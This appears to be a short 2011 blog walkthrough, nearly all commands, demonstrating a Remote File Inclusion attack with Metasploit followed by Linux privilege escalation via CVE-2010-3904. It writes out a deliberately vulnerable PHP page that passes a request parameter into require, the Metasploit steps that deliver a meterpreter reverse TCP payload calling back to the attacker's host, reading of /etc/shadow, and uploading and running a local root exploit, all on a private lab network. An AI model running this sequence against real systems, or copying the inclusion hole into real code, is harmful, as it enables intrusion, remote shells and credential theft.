Remote File Inclusion and privilege escalation through Metasploit

07/02/2011MetasploitKernel, Linux, RFIwow

Demonstration of a RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS Protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
<?php
$color='blue';
if(isset($_REQUEST['COLOR'])) {
$color = $_REQUEST['COLOR'];
}
require ($color . '.php');
?>

chown -R apache:apache 1

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit

getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow

lwpd
lcd /home/eromang/exploits/linux/local_escalations
upload linux-rds-exploit_CVE-2010-3904

execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow

Video demonstration